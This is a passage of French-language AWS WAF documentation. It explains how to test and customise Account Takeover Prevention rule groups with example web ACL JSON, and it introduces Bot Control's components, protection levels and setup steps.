   1. Dans les journaux de votre pack de protection (ACL Web), recherchez l'`awswaf:managed:aws:atp:signal:credential_compromised`étiquette dans le `labels` champ des entrées du journal pour vos demandes Web de connexion de test. Pour plus d’informations sur la journalisation, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 

   Après avoir vérifié que le groupe de règles capture les informations d'identification compromises comme prévu, vous pouvez prendre des mesures pour configurer sa mise en œuvre en fonction de vos besoins pour votre ressource protégée.

1. 

**Pour les CloudFront distributions, testez la gestion des échecs de connexion du groupe de règles**

   

   1. Effectuez un test pour chaque critère de réponse aux défaillances que vous avez configuré pour le groupe de règles ATP. Attendez au moins 10 minutes entre les tests.

      Pour tester un seul critère d'échec, identifiez une tentative de connexion qui échouera avec ce critère dans la réponse. Ensuite, à partir d'une seule adresse IP client, effectuez au moins 10 tentatives de connexion infructueuses en moins de 10 minutes.

      Après les 6 premiers échecs, la règle volumétrique des échecs de connexion devrait commencer à correspondre au reste de vos tentatives, à les étiqueter et à les compter. Il se peut que la règle omette le premier ou les deux premiers en raison de la latence. 

   1. Dans les journaux de votre pack de protection (ACL Web), recherchez l'`awswaf:managed:aws:atp:aggregate:volumetric:ip:failed_login_response:high`étiquette dans le `labels` champ des entrées du journal pour vos demandes Web de connexion de test. Pour plus d’informations sur la journalisation, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 

   Ces tests vérifient que vos critères d'échec correspondent à vos réponses en vérifiant que le nombre de connexions échouées dépasse les seuils de la règle`VolumetricIpFailedLoginResponseHigh`. Une fois les seuils atteints, si vous continuez à envoyer des demandes de connexion à partir de la même adresse IP, la règle continuera de correspondre jusqu'à ce que le taux d'échec tombe en dessous du seuil. Lorsque les seuils sont dépassés, la règle fait correspondre les connexions réussies ou échouées à partir de l'adresse IP. 

1. 

**Personnaliser le traitement des requêtes Web ATP**

   Le cas échéant, ajoutez vos propres règles qui autorisent ou bloquent explicitement les demandes, afin de modifier la façon dont les règles ATP les traiteraient autrement. 

   Par exemple, vous pouvez utiliser les étiquettes ATP pour autoriser ou bloquer les demandes ou pour personnaliser le traitement des demandes. Vous pouvez ajouter une règle de correspondance d'étiquettes après le groupe de règles géré par ATP afin de filtrer les demandes étiquetées pour le traitement que vous souhaitez appliquer. Après le test, maintenez les règles ATP associées en mode décompte et conservez les décisions relatives au traitement des demandes dans votre règle personnalisée. Pour obtenir un exemple, consultez [Exemple ATP : gestion personnalisée des informations d'identification manquantes ou compromises](waf-atp-control-example-user-agent-exception.md). 

1. 

**Supprimez vos règles de test et activez les paramètres du groupe de règles géré par ATP**

   Selon votre situation, vous avez peut-être décidé de laisser certaines règles ATP en mode décompte. Pour les règles que vous souhaitez exécuter telles que configurées au sein du groupe de règles, désactivez le mode de comptage dans la configuration du groupe de règles du pack de protection (ACL Web). Lorsque vous avez terminé le test, vous pouvez également supprimer les règles de correspondance de vos étiquettes de test.

1. 

**Surveillez et réglez**

   Pour vous assurer que les requêtes Web sont traitées comme vous le souhaitez, surveillez attentivement votre trafic après avoir activé la fonctionnalité ATP que vous souhaitez utiliser. Ajustez le comportement selon vos besoins en annulant le nombre de règles sur le groupe de règles et en appliquant vos propres règles. 

Une fois que vous aurez terminé de tester l'implémentation de votre groupe de règles ATP, si ce n'est déjà fait, nous vous recommandons vivement d'intégrer le AWS WAF JavaScript SDK dans la page de connexion de votre navigateur, afin d'améliorer les capacités de détection. AWS WAF fournit également un mobile SDKs pour intégrer les appareils iOS et Android. Pour plus d'informations sur l'intégration SDKs, consultez[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). Pour plus d'informations sur cette recommandation, consultez[Utilisation de l'intégration des applications SDKs avec ATP](waf-atp-with-tokens.md).

# AWS WAF Exemples de prévention des prises de contrôle des fraudes (ATP)
<a name="waf-atp-control-examples"></a>

Cette section présente des exemples de configurations qui répondent aux cas d'utilisation courants pour les implémentations de prévention du rachat de comptes (ATP) dans le cadre du contrôle des AWS WAF fraudes. 

Chaque exemple fournit une description du cas d'utilisation, puis montre la solution dans les listes JSON pour les règles configurées personnalisées. 

**Note**  
Vous pouvez récupérer des listes JSON telles que celles présentées dans ces exemples via le téléchargement du pack de protection de la console (ACL Web) ou l'éditeur JSON de règles, ou via l'`getWebACL`opération dans l'interface de ligne de commande APIs et l'interface de ligne de commande. 

**Topics**
+ [Exemple ATP : configuration simple](waf-atp-control-example-basic.md)
+ [Exemple ATP : gestion personnalisée des informations d'identification manquantes ou compromises](waf-atp-control-example-user-agent-exception.md)
+ [Exemple ATP : configuration de l'inspection des réponses](waf-atp-control-example-response-inspection.md)

# Exemple ATP : configuration simple
<a name="waf-atp-control-example-basic"></a>

La liste JSON suivante montre un exemple de pack de protection (ACL Web) avec un groupe de règles géré par AWS WAF Fraud Control Account Takeover Prevention (ATP). Notez la configuration supplémentaire de la page de connexion, qui fournit au groupe de règles les informations dont il a besoin pour surveiller et gérer vos demandes de connexion. Ce JSON inclut les paramètres générés automatiquement par le pack de protection (ACL Web), tels que l'espace de noms des étiquettes et l'URL d'intégration des applications du pack de protection (ACL Web).

```
{
    "WebACL": {
        "LabelNamespace": "awswaf:111122223333:webacl:ATPModuleACL:",
        "Capacity": 50,
        "Description": "This is a test protection pack (web ACL) for ATP.",
        "Rules": [
            {
                "Priority": 1,
                "OverrideAction": {
                    "None": {}
                },
                "VisibilityConfig": {
                    "SampledRequestsEnabled": true,
                    "CloudWatchMetricsEnabled": true,
                    "MetricName": "AccountTakeOverValidationRule"
                },
                "Name": "DetectCompromisedUserCredentials",
                "Statement": {
                    "ManagedRuleGroupStatement": {
                        "VendorName": "AWS",
                        "Name": "AWSManagedRulesATPRuleSet",
                        "ManagedRuleGroupConfigs": [
                          {
                            "AWSManagedRulesATPRuleSet": {
                              "LoginPath": "/web/login",
                              "RequestInspection": {
                                "PayloadType": "JSON",
                                "UsernameField": {
                                  "Identifier": "/form/username"
                                },
                                "PasswordField": {
                                  "Identifier": "/form/password"
                                }
                              },
                              "EnableRegexInPath": false
                            }
                          }
                        ]
                    }
                }
            }
        ],
        "VisibilityConfig": {
            "SampledRequestsEnabled": true,
            "CloudWatchMetricsEnabled": true,
            "MetricName": "ATPValidationAcl"
        },
        "DefaultAction": {
            "Allow": {}
        },
        "ManagedByFirewallManager": false,
        "RetrofittedByFirewallManager": false,
        "Id": "32q10987-65rs-4tuv-3210-98765wxyz432",
        "ARN": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/ATPModuleACL/32q10987-65rs-4tuv-3210-98765wxyz432",
        "Name": "ATPModuleACL"
    },
    "ApplicationIntegrationURL": "https://9z87abce34ea.us-east-1.sdk.awswaf.com/9z87abce34ea/1234567a1b10/",
    "LockToken": "6d0e6966-95c9-48b6-b51d-8e82e523b847"
}
```

# Exemple ATP : gestion personnalisée des informations d'identification manquantes ou compromises
<a name="waf-atp-control-example-user-agent-exception"></a>

Par défaut, les vérifications d'identification effectuées par le groupe de règles `AWSManagedRulesATPRuleSet` traitent les demandes Web de la manière suivante : 
+ **Informations d'identification manquantes** — Libellé et demande de blocage.
+ **Informations d'identification compromises** : étiquetez la demande, mais ne la bloquez pas et ne la comptez pas.

Pour plus de détails sur le groupe de règles et le comportement des règles, consultez[AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md).

Vous pouvez ajouter un traitement personnalisé pour les requêtes Web dont les informations d'identification sont manquantes ou compromises en procédant comme suit : 
+ **Remplacer la `MissingCredential` règle par Count : cette action de dérogation permet à** la règle de compter et d'étiqueter uniquement les demandes correspondantes.
+ **Ajouter une règle de correspondance des étiquettes avec gestion personnalisée** : configurez cette règle pour qu'elle corresponde aux deux étiquettes ATP et pour effectuer votre gestion personnalisée. Par exemple, vous pouvez rediriger le client vers votre page d'inscription.

La règle suivante montre le groupe de règles géré par ATP dans l'exemple précédent, l'action de la `MissingCredential` règle étant remplacée pour être prise en compte. Cela oblige la règle à appliquer son étiquette aux demandes correspondantes, puis à ne compter que les demandes, au lieu de les bloquer. 

```
"Rules": [
    {
        "Priority": 1,
        "OverrideAction": {
            "None": {}
        },
        "VisibilityConfig": {
            "SampledRequestsEnabled": true,
            "CloudWatchMetricsEnabled": true,
            "MetricName": "AccountTakeOverValidationRule"
        },
        "Name": "DetectCompromisedUserCredentials",
        "Statement": {
            "ManagedRuleGroupStatement": {
                "ManagedRuleGroupConfigs": [
                  {
                    "AWSManagedRulesATPRuleSet": {
                      "LoginPath": "/web/login",
                      "RequestInspection": {
                        "PayloadType": "JSON",
                        "UsernameField": {
                          "Identifier": "/form/username"
                        },
                        "PasswordField": {
                          "Identifier": "/form/password"
                        }
                      },
                      "EnableRegexInPath": false
                    }
                  }
                ]
                "VendorName": "AWS",
                "Name": "AWSManagedRulesATPRuleSet",
                "RuleActionOverrides": [
                  {
                    "ActionToUse": {
                      "Count": {}
                    },
                    "Name": "MissingCredential"
                  }
                ],
                "ExcludedRules": []
            }
        }
    }
],
```

Avec cette configuration, lorsque ce groupe de règles évalue une demande Web dont les informations d'identification sont manquantes ou compromises, il étiquette la demande, mais ne la bloque pas. 

La règle suivante possède un paramètre de priorité supérieur numériquement à celui du groupe de règles précédent. AWS WAF évalue les règles dans l'ordre numérique, en commençant par le plus bas, de sorte que cette règle sera évaluée après l'évaluation du groupe de règles. La règle est configurée pour correspondre à l'une ou l'autre des étiquettes d'identification et pour envoyer une réponse personnalisée aux demandes correspondantes. 

```
"Name": "redirectToSignup",
      "Priority": 10,
      "Statement": {
        "OrStatement": {
          "Statements": [
            {
              "LabelMatchStatement": {
                "Scope": "LABEL",
                "Key": "awswaf:managed:aws:atp:signal:missing_credential"
              }
            },
            {
              "LabelMatchStatement": {
                "Scope": "LABEL",
                "Key": "awswaf:managed:aws:atp:signal:credential_compromised"
              }
            }
          ]
        }
      },
      "Action": {
        "Block": {
          "CustomResponse": {
             your custom response settings 
          }
        }
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "redirectToSignup"
      }
```

# Exemple ATP : configuration de l'inspection des réponses
<a name="waf-atp-control-example-response-inspection"></a>

La liste JSON suivante montre un exemple de pack de protection (ACL Web) avec un groupe de règles géré par AWS WAF Fraud Control Account Takeover Prevention (ATP) configuré pour inspecter les réponses d'origine. Notez la configuration de l'inspection des réponses, qui spécifie les codes de réussite et d'état de réponse. Vous pouvez également configurer les paramètres de réussite et de réponse en fonction des correspondances JSON entre en-tête, corps et corps. Ce JSON inclut les paramètres générés automatiquement par le pack de protection (ACL Web), tels que l'espace de noms des étiquettes et l'URL d'intégration des applications du pack de protection (ACL Web).

**Note**  
L'inspection des réponses ATP n'est disponible que dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions.

```
{
    "WebACL": {
        "LabelNamespace": "awswaf:111122223333:webacl:ATPModuleACL:",
        "Capacity": 50,
        "Description": "This is a test protection pack (web ACL) for ATP.",
        "Rules": [
            {
                "Priority": 1,
                "OverrideAction": {
                    "None": {}
                },
                "VisibilityConfig": {
                    "SampledRequestsEnabled": true,
                    "CloudWatchMetricsEnabled": true,
                    "MetricName": "AccountTakeOverValidationRule"
                },
                "Name": "DetectCompromisedUserCredentials",
                "Statement": {
                    "ManagedRuleGroupStatement": {
                        "VendorName": "AWS",
                        "Name": "AWSManagedRulesATPRuleSet",
                        "ManagedRuleGroupConfigs": [
                          {
                            "AWSManagedRulesATPRuleSet": {
                              "LoginPath": "/web/login",
                              "RequestInspection": {
                                "PayloadType": "JSON",
                                "UsernameField": {
                                  "Identifier": "/form/username"
                                },
                                "PasswordField": {
                                  "Identifier": "/form/password"
                                }
                              },
                              "ResponseInspection": {
                                "StatusCode": {
                                  "SuccessCodes": [
                                    200
                                  ],
                                  "FailureCodes": [
                                    401
                                  ]
                                }
                              },
                              "EnableRegexInPath": false
                            }
                          }
                        ]
                    }
                }
            }
        ],
        "VisibilityConfig": {
            "SampledRequestsEnabled": true,
            "CloudWatchMetricsEnabled": true,
            "MetricName": "ATPValidationAcl"
        },
        "DefaultAction": {
            "Allow": {}
        },
        "ManagedByFirewallManager": false,
        "RetrofittedByFirewallManager": false,
        "Id": "32q10987-65rs-4tuv-3210-98765wxyz432",
        "ARN": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/ATPModuleACL/32q10987-65rs-4tuv-3210-98765wxyz432",
        "Name": "ATPModuleACL"
    },
    "ApplicationIntegrationURL": "https://9z87abce34ea.us-east-1.sdk.awswaf.com/9z87abce34ea/1234567a1b10/",
    "LockToken": "6d0e6966-95c9-48b6-b51d-8e82e523b847"
}
```

# AWS WAF Contrôle des robots
<a name="waf-bot-control"></a>

Cette section explique ce que fait Bot Control.

Avec Bot Control, vous pouvez facilement surveiller, bloquer ou limiter le débit des robots tels que les scrapers, les scanners, les robots d'exploration, les moniteurs d'état et les moteurs de recherche. Si vous utilisez le niveau d'inspection ciblé du groupe de règles, vous pouvez également défier les robots qui ne s'identifient pas eux-mêmes, rendant ainsi plus difficile et plus coûteuse l'action des robots malveillants sur votre site Web. Vous pouvez protéger vos applications à l'aide du groupe de règles géré par Bot Control seul ou en combinaison avec d'autres groupes de règles AWS gérées et vos propres AWS WAF règles personnalisées. 

Bot Control inclut un tableau de bord de console qui indique la part de votre trafic actuel provenant de robots, sur la base d'un échantillonnage de demandes. Avec le groupe de règles géré par Bot Control ajouté à votre pack de protection (ACL Web), vous pouvez prendre des mesures contre le trafic de bots et recevoir des informations détaillées en temps réel sur le trafic de bots courant arrivant vers vos applications. 

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

Le groupe de règles géré par Bot Control fournit un niveau de protection commun de base qui ajoute des étiquettes aux robots qui s'identifient eux-mêmes, vérifie les robots généralement souhaitables et détecte les signatures de robots hautement fiables. Cela vous permet de surveiller et de contrôler les catégories courantes de trafic de bots. 

Le groupe de règles Bot Control fournit également un niveau de protection ciblé qui permet de détecter les robots sophistiqués qui ne s'identifient pas eux-mêmes. Les protections ciblées utilisent des techniques de détection telles que l'interrogation du navigateur, la prise d'empreintes digitales et l'heuristique comportementale pour identifier le trafic de bots défectueux. En outre, les protections ciblées fournissent en option une analyse automatique par apprentissage automatique des statistiques de trafic du site Web afin de détecter les activités liées aux robots. Lorsque vous activez l'apprentissage automatique, AWS WAF utilise des statistiques sur le trafic du site Web, telles que les horodatages, les caractéristiques du navigateur et l'URL précédemment visitée, afin d'améliorer le modèle d'apprentissage automatique Bot Control. 

Lors de l' AWS WAF évaluation d'une demande Web par rapport au groupe de règles géré par Bot Control, le groupe de règles ajoute des étiquettes aux demandes qu'il détecte comme liées au bot, par exemple la catégorie du bot et le nom du bot. Vous pouvez les comparer à ces libellés dans vos propres AWS WAF règles afin de personnaliser le traitement. Les étiquettes générées par le groupe de règles géré par Bot Control sont incluses dans les CloudWatch métriques Amazon et dans les journaux de votre pack de protection (ACL Web). 

Vous pouvez également utiliser des AWS Firewall Manager AWS WAF politiques pour déployer le groupe de règles géré par Bot Control dans vos applications dans plusieurs comptes appartenant à votre organisation AWS Organizations.

Pour plus d'informations sur le groupe de règles géré par Bot Control, consultez[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md). 

## Authentification par bot Web pour les agents d'intelligence artificielle
<a name="waf-bot-ai-agents"></a>

AWS WAF Bot Control prend désormais en charge l'authentification par bot Web (WBA) en tant que méthode de vérification cryptographique pour les robots et les agents d'intelligence artificielle accédant à vos CloudFront distributions. Cette fonctionnalité permet aux robots d'exploration et aux agents d'intelligence artificielle légitimes de prouver leur identité sans avoir à recourir aux mécanismes traditionnels de réponse aux défis.

Version requise : `AWSManagedRulesBotControlRuleSet` Version\$14.0 ou version ultérieure. (La version statique doit être sélectionnée de manière explicite.) Pour une classification détaillée des étiquettes et le comportement des règles, voir : 
+ [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md)
+ [Étiquetage des requêtes Web dans AWS WAF](waf-labels.md)
+ [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md)

# AWS WAF Composants de Bot Control
<a name="waf-bot-control-components"></a>

Les principaux composants d'une implémentation de Bot Control sont les suivants :
+ **`AWSManagedRulesBotControlRuleSet`**— Le groupe de règles géré par Bot Control dont les règles détectent et gèrent différentes catégories de robots. Ce groupe de règles ajoute des libellés aux requêtes Web qu'il détecte comme du trafic de bots. 
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

Le groupe de règles gérées par Bot Control fournit deux niveaux de protection parmi lesquels vous pouvez choisir : 
  + **Fréquent** : détecte une variété de robots auto-identifiables, tels que les frameworks de scraping Web, les moteurs de recherche et les navigateurs automatisés. Les protections Bot Control à ce niveau identifient les robots courants à l'aide de techniques de détection de bots traditionnelles, telles que l'analyse statique des données des demandes. Les règles étiquettent le trafic provenant de ces robots et bloquent ceux qu'ils ne peuvent pas vérifier. 
  + **Ciblé** : inclut les protections de niveau commun et ajoute une détection ciblée pour les robots sophistiqués qui ne s'identifient pas eux-mêmes. Des protections ciblées atténuent l'activité des robots en combinant la limitation du débit, les CAPTCHA et les défis liés au navigateur en arrière-plan. 
    + **`TGT_`**— Les règles qui fournissent une protection ciblée portent des noms commençant par`TGT_`. Toutes les protections ciblées utilisent des techniques de détection telles que l'interrogation du navigateur, la prise d'empreintes digitales et l'heuristique comportementale pour identifier le trafic de bots défectueux. 
    + **`TGT_ML_`**— Les règles de protection ciblées qui utilisent l'apprentissage automatique portent des noms commençant par`TGT_ML_`. Ces règles utilisent une analyse automatisée par apprentissage automatique des statistiques de trafic du site Web pour détecter les comportements anormaux indiquant une activité distribuée et coordonnée des bots. AWS WAF analyse les statistiques relatives au trafic de votre site Web, telles que les horodatages, les caractéristiques du navigateur et les URL précédemment visitées, afin d'améliorer le modèle d'apprentissage automatique de Bot Control. Les fonctionnalités d'apprentissage automatique sont activées par défaut, mais vous pouvez les désactiver dans la configuration de votre groupe de règles. Lorsque l'apprentissage automatique est désactivé, AWS WAF n'évalue pas ces règles. 

  Pour plus de détails, notamment des informations sur les règles du groupe de règles, consultez[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md). 

  Vous incluez ce groupe de règles dans votre pack de protection (ACL Web) à l'aide d'une déclaration de référence de groupe de règles géré et en indiquant le niveau d'inspection que vous souhaitez utiliser. Pour le niveau ciblé, vous indiquez également si vous souhaitez activer l'apprentissage automatique. Pour plus d'informations sur l'ajout de ce groupe de règles géré à votre pack de protection (ACL Web), consultez[Ajout du groupe de règles géré par AWS WAF Bot Control à votre ACL Web](waf-bot-control-rg-using.md). 
+ **Tableau de bord de contrôle** des bots : tableau de bord de surveillance des bots pour votre pack de protection (ACL Web), disponible via l'onglet Bot Control du pack de protection (ACL Web). Utilisez ce tableau de bord pour surveiller votre trafic et comprendre dans quelle mesure celui-ci provient de différents types de robots. Cela peut être un point de départ pour personnaliser la gestion de votre bot, comme décrit dans cette rubrique. Vous pouvez également l'utiliser pour vérifier vos modifications et surveiller l'activité de différents robots et catégories de robots. 
+ Tableau de **bord d'analyse du trafic AI** : tableau de bord spécialisé pour une analyse détaillée de l'activité des robots et des agents IA, disponible via l'onglet Analyse du trafic AI du pack de protection (ACL Web). Offre une visibilité améliorée sur les modèles de trafic, les intentions des robots et les comportements d'accès spécifiques à l'IA, au-delà des indicateurs standard de contrôle des robots.
+ **JavaScript et intégration des applications mobiles SDKs** : vous devez implémenter le AWS WAF JavaScript et mobile SDKs si vous utilisez le niveau de protection ciblé du groupe de règles Bot Control. Les règles ciblées utilisent les informations fournies par les jetons intégrés SDKs au client pour une meilleure détection contre les robots malveillants. Pour plus d'informations sur le SDKs, consultez[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md).
+ **Journalisation et statistiques** : vous pouvez surveiller le trafic de votre bot et comprendre comment le groupe de règles géré par Bot Control évalue et gère votre trafic en étudiant les données collectées pour votre pack de protection (ACL Web) par AWS WAF les journaux, Amazon Security Lake et Amazon CloudWatch. Les étiquettes que Bot Control ajoute à vos requêtes Web sont incluses dans les données. Pour plus d'informations sur ces options[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md), consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md), et [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) . 

  En fonction de vos besoins et du trafic que vous constatez, vous souhaiterez peut-être personnaliser votre implémentation de Bot Control. Voici quelques-unes des options les plus couramment utilisées.
+ Instructions de **portée réduite** : vous pouvez exclure une partie du trafic des demandes Web évaluées par le groupe de règles géré par Bot Control en ajoutant une instruction de portée réduite dans la déclaration de référence du groupe de règles géré par Bot Control. Une instruction scope-down peut être n'importe quelle déclaration de règle imbriquable. Lorsqu'une demande ne correspond pas à l'instruction scope-down, elle est AWS WAF évaluée comme ne correspondant pas à l'instruction de référence du groupe de règles sans l'évaluer par rapport au groupe de règles. Pour plus d'informations sur les instructions de portée réduite, consultez. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md)

  Les coûts liés à l'utilisation du groupe de règles géré par Bot Control augmentent en fonction du nombre de requêtes Web AWS WAF évaluées à l'aide de ce groupe. Vous pouvez contribuer à réduire ces coûts en utilisant une instruction scope-down pour limiter les demandes évaluées par le groupe de règles. Par exemple, vous pouvez autoriser le chargement de votre page d'accueil pour tout le monde, y compris les robots, puis appliquer les règles du groupe de règles aux demandes destinées à votre application APIs ou contenant un type de contenu particulier. 
+ **Étiquettes et règles de correspondance d'étiquettes** : vous pouvez personnaliser la façon dont le groupe de règles Bot Control gère une partie du trafic de robots qu'il identifie à l'aide de l'instruction de règle de correspondance des AWS WAF étiquettes. Le groupe de règles Bot Control ajoute des étiquettes à vos requêtes Web. Vous pouvez ajouter des règles de correspondance d'étiquettes après le groupe de règles Bot Control qui correspondent aux étiquettes Bot Control et appliquer le traitement dont vous avez besoin. Pour plus d'informations sur l'étiquetage et l'utilisation des instructions de correspondance des étiquettes, consultez [Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md) et[Étiquetage des requêtes Web dans AWS WAF](waf-labels.md). 
+ **Demandes et réponses personnalisées** — Vous pouvez ajouter des en-têtes personnalisés aux demandes que vous autorisez et vous pouvez envoyer des réponses personnalisées pour les demandes que vous bloquez en associant l'étiquette correspondant aux fonctionnalités de demande et de réponse AWS WAF personnalisées. Pour plus d'informations sur la personnalisation des demandes et des réponses, consultez[Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

# Utilisation de l'intégration d'applications SDKs avec Bot Control
<a name="waf-bot-with-tokens"></a>

Cette section explique comment utiliser l'intégration d'applications SDKs avec Bot Control.

La plupart des protections ciblées du groupe de règles géré par Bot Control nécessitent les jetons de défi SDKs générés par l'intégration de l'application. Les règles qui ne nécessitent pas de jeton de défi sur la demande sont les protections de niveau commun Bot Control et les règles d'apprentissage automatique de niveau ciblé. Pour une description des niveaux de protection et des règles du groupe de règles, consultez[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md). 

Nous vous recommandons vivement de mettre en œuvre l'intégration de l'application SDKs, afin d'utiliser le plus efficacement possible le groupe de règles Bot Control. Le script de défi doit être exécuté avant le groupe de règles Bot Control pour que le groupe de règles puisse bénéficier des jetons acquis par le script. 
+ Avec l'intégration de l'application SDKs, le script s'exécute automatiquement.
+ Si vous ne parvenez pas à utiliser le SDKs, vous pouvez configurer votre pack de protection (ACL Web) afin qu'il exécute l'action de CAPTCHA règle Challenge ou contre toutes les demandes qui seront inspectées par le groupe de règles Bot Control. L'utilisation de l'action Challenge ou de la CAPTCHA règle peut entraîner des frais supplémentaires. Pour plus d'informations sur la tarification, consultez la page [AWS WAF Pricing](https://aws.amazon.com/waf/pricing/) (Tarification). 

Lorsque vous implémentez l'intégration de l'application SDKs dans vos clients ou que vous utilisez l'une des actions de règle qui exécute le script de défi, vous étendez les fonctionnalités du groupe de règles et la sécurité globale de votre application client. 

Les jetons fournissent des informations sur le client à chaque demande Web. Ces informations supplémentaires permettent au groupe de règles Bot Control de séparer les sessions client légitimes des sessions client mal gérées, même lorsque les deux proviennent d'une seule adresse IP. Le groupe de règles utilise les informations contenues dans les jetons pour agréger le comportement des demandes de session client afin de permettre une détection et une atténuation précises fournies par le niveau de protection ciblé. 

Pour plus d'informations sur le SDKs, voir[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). Pour plus d'informations sur AWS WAF les jetons, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). Pour plus d'informations sur les actions des règles, consultez[CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md).

# Ajout du groupe de règles géré par AWS WAF Bot Control à votre ACL Web
<a name="waf-bot-control-rg-using"></a>

Cette section explique comment ajouter et configurer le groupe de `AWSManagedRulesBotControlRuleSet` règles.

Le groupe de règles géré par Bot Control `AWSManagedRulesBotControlRuleSet` nécessite une configuration supplémentaire pour identifier le niveau de protection que vous souhaitez implémenter. 

Pour la description du groupe de règles et la liste des règles, voir[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md).

Ce guide est destiné aux utilisateurs qui savent généralement comment créer et gérer des packs de AWS WAF protection (Web ACLs), des règles et des groupes de règles. Ces sujets sont abordés dans les sections précédentes de ce guide. Pour obtenir des informations de base sur l'ajout d'un groupe de règles géré à votre pack de protection (ACL Web), consultez[Ajout d'un groupe de règles géré à un pack de protection (ACL Web) via la console](waf-using-managed-rule-group.md).

**Suivez les meilleures pratiques**  
Utilisez le groupe de règles Bot Control conformément aux meilleures pratiques de[Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md). 

**Pour utiliser le groupe de `AWSManagedRulesBotControlRuleSet` règles dans votre pack de protection (ACL Web)**

1. Ajoutez le groupe de règles AWS géré `AWSManagedRulesBotControlRuleSet` à votre pack de protection (ACL Web). Pour la description complète du groupe de règles, voir[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md). 
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

   Lorsque vous ajoutez le groupe de règles, modifiez-le pour ouvrir la page de configuration du groupe de règles. 

1. Sur la page de configuration du groupe de règles, dans le volet **Niveau d'inspection**, sélectionnez le niveau d'inspection que vous souhaitez utiliser. 
   + **Fréquent** : détecte une variété de robots auto-identifiables, tels que les frameworks de scraping Web, les moteurs de recherche et les navigateurs automatisés. Les protections Bot Control à ce niveau identifient les robots courants à l'aide de techniques de détection de bots traditionnelles, telles que l'analyse statique des données des demandes. Les règles étiquettent le trafic provenant de ces robots et bloquent ceux qu'ils ne peuvent pas vérifier. 
   + **Ciblé** : inclut les protections de niveau commun et ajoute une détection ciblée pour les robots sophistiqués qui ne s'identifient pas eux-mêmes. Des protections ciblées atténuent l'activité des robots en combinant la limitation du débit, le CAPTCHA et les défis liés au navigateur en arrière-plan. 
     + **`TGT_`**— Les règles qui fournissent une protection ciblée portent des noms commençant par`TGT_`. Toutes les protections ciblées utilisent des techniques de détection telles que l'interrogation du navigateur, la prise d'empreintes digitales et l'heuristique comportementale pour identifier le trafic de bots défectueux. 
     + **`TGT_ML_`**— Les règles de protection ciblées qui utilisent l'apprentissage automatique portent des noms commençant par`TGT_ML_`. Ces règles utilisent une analyse automatisée par apprentissage automatique des statistiques de trafic du site Web pour détecter les comportements anormaux indiquant une activité distribuée et coordonnée des bots. AWS WAF analyse les statistiques relatives au trafic de votre site Web, telles que les horodatages, les caractéristiques du navigateur et les URL précédemment visitées, afin d'améliorer le modèle d'apprentissage automatique de Bot Control. Les fonctionnalités d'apprentissage automatique sont activées par défaut, mais vous pouvez les désactiver dans la configuration de votre groupe de règles. Lorsque l'apprentissage automatique est désactivé, AWS WAF n'évalue pas ces règles. 

1. Si vous utilisez le niveau de protection ciblé et que vous ne AWS WAF souhaitez pas utiliser le machine learning (ML) pour analyser le trafic Web afin de détecter l'activité distribuée et coordonnée des bots, désactivez l'option d'apprentissage automatique. L'apprentissage automatique est requis pour les règles de contrôle des robots dont le nom commence par`TGT_ML_`. Pour plus de détails sur ces règles, consultez[Liste des règles de contrôle des bots](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-rules).

1. Ajoutez une déclaration de portée réduite pour le groupe de règles, afin de contenir les coûts liés à son utilisation. Une instruction scope-down réduit l'ensemble des demandes inspectées par le groupe de règles. Par exemple, les cas d'utilisation, commencez par [Exemple de Bot Control : utilisation du Bot Control uniquement pour la page de connexion](waf-bot-control-example-scope-down-login.md) et[Exemple de contrôle des robots : utilisation du contrôle des robots uniquement pour le contenu dynamique](waf-bot-control-example-scope-down-dynamic-content.md). 

1. Fournissez toute configuration supplémentaire dont vous avez besoin pour le groupe de règles. 

1. Enregistrez les modifications apportées au pack de protection (ACL Web). 

Avant de déployer votre implémentation Bot Control pour le trafic de production, testez-la et ajustez-la dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite les règles en mode comptage avec votre trafic de production avant de les activer. Consultez les sections qui suivent pour obtenir des conseils. 

# Exemples de scénarios de faux positifs avec AWS WAF Bot Control
<a name="waf-bot-control-false-positives"></a>

